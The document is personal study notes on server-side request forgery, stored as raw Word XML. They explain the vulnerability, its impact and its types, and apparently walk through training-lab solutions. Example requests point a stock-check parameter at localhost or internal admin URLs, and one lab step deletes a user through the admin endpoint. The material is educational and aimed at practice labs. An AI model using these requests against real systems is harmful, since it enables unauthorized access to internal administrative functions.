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74F69A" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00077875">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server-</w:t>
      </w:r>
      <w:r w:rsidRPr="00077875">
        <w:t>side</w:t>
      </w:r>
      <w:r w:rsidRPr="00077875">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00077875">
        <w:t>request</w:t>
      </w:r>
      <w:r w:rsidRPr="00077875">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> forgery (SSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C255765" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00077875" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00077875">
        <w:t xml:space="preserve">In this section we explain what server-side request forgery (SSRF) is, and describe some common examples. We also show you how to find and exploit SSRF vulnerabilities. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F96BBA5" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00604D58" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00077875">
        <w:t>What is SSRF?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A98FD2" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00077875" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00077875">
        <w:t xml:space="preserve">Server-side request forgery is a web security vulnerability that allows an attacker to cause the server-side application to make requests to an unintended location. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FF2DE6" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00077875" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00077875">
        <w:t xml:space="preserve">In a typical SSRF attack, the attacker might cause the server to make a connection to internal-only services within the organization's infrastructure. In other cases, they may be able to force the server to connect to arbitrary external systems. This could leak sensitive data, such as authorization credentials. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1390BCC1" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00FA4090">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F0DBB33" wp14:editId="3CD35338">
            <wp:extent cx="5731510" cy="3229610"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="196447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6837" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3229610"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A5F6AE" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00604D58" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA4090">
        <w:t>What is the impact of SSRF attacks?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F53E64" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00FA2247" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00FA2247">
        <w:t xml:space="preserve">A successful SSRF attack can often result in unauthorized actions or access to data within the organization. This can be in the vulnerable application, or on other back-end systems that the application can communicate with. In some situations, the SSRF vulnerability might allow an attacker to perform arbitrary command execution. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12673941" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00FA2247">
        <w:t xml:space="preserve">An SSRF exploit that causes connections to external third-party systems might result in malicious onward attacks. These can appear to originate from the organization hosting the vulnerable application. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0C2B90" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52"/>
    <w:p w14:paraId="76EFE895" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Types of SSRF  -&gt; extra point from YT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBAA1F3" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t>Regular/ Inband</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Blind / out-of-band</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE3D100" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="122C4DF5" wp14:editId="48B775D6">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="70226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66595" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D5D23B" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="413077AC" wp14:editId="7B6BCEA8">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="77767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73393" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EEE41E" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52"/>
    <w:p w14:paraId="0CB24611" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00BF30A4" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71E406AD" wp14:editId="53E12098">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="80539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92926" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E36B49F" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00604D58">
        <w:t>Common SSRF attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BC0551" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="002B6CCC">
        <w:t>SSRF attacks often exploit trust relationships to escalate an attack from the vulnerable application and perform unauthorized actions. These trust relationships might exist in relation to the server, or in relation to other back-end systems within the same organization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F24A7D3" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00612BB7">
        <w:t>SSRF attacks against the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C473AB9" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="000B56C5">
        <w:t xml:space="preserve">In an SSRF attack against the server, the attacker causes the application to make an HTTP request back to the server that is hosting the application, via its loopback network interface. This typically involves supplying a URL with a hostname like </w:t>
      </w:r>
      <w:r w:rsidRPr="00932FCA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidRPr="000B56C5">
        <w:t xml:space="preserve"> (a reserved IP address that points to the loopback adapter) or </w:t>
      </w:r>
      <w:r w:rsidRPr="00932FCA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
      <w:r w:rsidRPr="000B56C5">
        <w:t xml:space="preserve"> (a commonly used name for the same adapter).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A4825A" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00A74A43">
        <w:t>For example, imagine a shopping application that lets the user view whether an item is in stock in a particular store. To provide the stock information, the application must query various back-end REST APIs. It does this by passing the URL to the relevant back-end API endpoint via a front-end HTTP request. When a user views the stock status for an item, their browser makes the following request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0929AAEA" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00612BB7" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00E62BC7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>POST /product/stock HTTP/1.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00E62BC7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
      <w:r w:rsidRPr="00E62BC7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
        <w:t>Content-Length: 118</w:t>
      </w:r>
      <w:r w:rsidRPr="00E62BC7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E62BC7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
        <w:t>stockApi=http://stock.weliketoshop.net:8080/product/stock/check%3FproductId%3D6%26storeId%3D1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8E7BFF" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00336770" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00336770">
        <w:t xml:space="preserve">This causes the server to make a request to the specified URL, retrieve the stock status, and return this to the user. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B37A6D3" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00336770" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00336770">
        <w:t xml:space="preserve">In this example, an attacker can modify the request to specify a URL local to the server: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0107C78B" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="0001679D">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /product/stock HTTP/1.0 </w:t>
      </w:r>
      <w:r w:rsidRPr="0001679D">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Content-Type: application/x-www-form-urlencoded </w:t>
      </w:r>
      <w:r w:rsidRPr="0001679D">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0001679D">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Content-Length: 118</w:t>
      </w:r>
      <w:r w:rsidRPr="0001679D">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0001679D">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
        <w:t>stockApi=http://localhost/admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227EDFA3" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="0001679D" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="0001679D">
        <w:t xml:space="preserve">The server fetches the contents of the </w:t>
      </w:r>
      <w:r w:rsidRPr="0001679D">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/admin</w:t>
      </w:r>
      <w:r w:rsidRPr="0001679D">
        <w:t xml:space="preserve"> URL and returns it to the user. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78563645" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00641858" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00641858">
        <w:t xml:space="preserve">The server fetches the contents of the /admin URL and returns it to the user. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6CFA67" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00641858" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00641858">
        <w:t xml:space="preserve">An attacker can visit the </w:t>
      </w:r>
      <w:r w:rsidRPr="00641858">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00641858">
        <w:t xml:space="preserve"> URL, but the administrative functionality is normally only accessible to authenticated users. This means an attacker won't see anything of interest. However, if the request to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00641858">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00641858">
        <w:t xml:space="preserve"> URL comes from the local machine, the normal access controls are bypassed. The application grants full access to the administrative functionality, because the request appears to originate from a trusted location. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CF10EA" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52"/>
    <w:p w14:paraId="03C8D680" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00F11041" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00F11041">
        <w:t xml:space="preserve">LAB </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD998C8" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00F11041">
        <w:t xml:space="preserve">APPRENTICE </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00F11041">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Basic SSRF against the local server</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F11041">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Sol- </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB0053">
        <w:t xml:space="preserve">This lab has a stock check feature which fetches data from an internal system. </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FD5AD1">
        <w:t>change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C717E9" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t>If added http://localhost to check any server running on it it says 200.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ED04A9" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EAC49E5" wp14:editId="329BDEDD">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="172539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94016" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D89805" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t>Admin is visible in response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4CBC60" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Enter URL encoded URL at api key</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20C183C0" wp14:editId="3AE830D2">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="155782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26452" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E3906F" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78A5BA7B" wp14:editId="08F00ADB">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="193241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12925" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A28B8D4" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t>Can use /admin/delete?username=carlos to delete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07479A4D" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BDD24EF" wp14:editId="6DDED98F">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="129846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65197" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F7240F" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00980E3B" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00980E3B">
        <w:t xml:space="preserve">Why do applications behave in this way, and implicitly trust requests that come from the local machine? This can arise for various reasons: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042F341C" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00980E3B" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00980E3B">
        <w:t xml:space="preserve">The access control check might be implemented in a different component that sits in front of the application server. When a connection is made back to the server, the check is bypassed. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EED5CA" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00980E3B" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00980E3B">
        <w:t xml:space="preserve">For disaster recovery purposes, the application might allow administrative access without logging in, to any user coming from the local machine. This provides a way for an administrator to recover the system if they lose their credentials. This assumes that only a fully trusted user would come directly from the server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628C6206" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00980E3B" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00980E3B">
        <w:t xml:space="preserve">The administrative interface might listen on a different port number to the main application, and might not be reachable directly by users. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E99707F" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00980E3B" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00980E3B">
        <w:t>These kind of trust relationship</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00980E3B">
        <w:t xml:space="preserve">, where requests originating from the local machine are handled differently than ordinary requests, often make SSRF into a critical vulnerability. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7D9CB1" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52"/>
    <w:p w14:paraId="30F10300" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00080DE0">
        <w:t>SSRF attacks against other back-end systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290CE288" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00CA3525">
        <w:t>In some cases, the application server is able to interact with back-end systems that are not directly reachable by users. These systems often have non-routable private IP addresses. The back-end systems are normally protected by the network topology, so they often have a weaker security posture. In many cases, internal back-end systems contain sensitive functionality that can be accessed without authentication by anyone who is able to interact with the systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5B327A" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00B0556F">
        <w:t xml:space="preserve">In the previous example, imagine there is an administrative interface at the back-end URL </w:t>
      </w:r>
      <w:r w:rsidRPr="00B0556F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>https://192.168.0.68/admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00B0556F">
        <w:t xml:space="preserve">. An attacker can submit the following request to exploit the SSRF vulnerability, and access the administrative interface: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAC5F91" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00B0556F" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00AA26D4">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /product/stock HTTP/1.0 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA26D4">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Content-Type: application/x-www-form-urlencoded </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA26D4">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00AA26D4">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t xml:space="preserve">Content-Length: 118 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA26D4">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
        <w:t>stockApi=http://192.168.0.68/admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDB1138" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52"/>
    <w:p w14:paraId="15307F7E" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="002D4BB9" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="002D4BB9">
        <w:t xml:space="preserve">LAB </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0097B8B4" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00150B27" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="002D4BB9">
        <w:t xml:space="preserve">APPRENTICE </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="002D4BB9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Basic SSRF against another back-end system</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002D4BB9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Sol - </w:t>
      </w:r>
      <w:r w:rsidRPr="00150B27">
        <w:t xml:space="preserve">This lab has a stock check feature which fetches data from an internal system. </w:t>
      </w:r>
    </w:p>
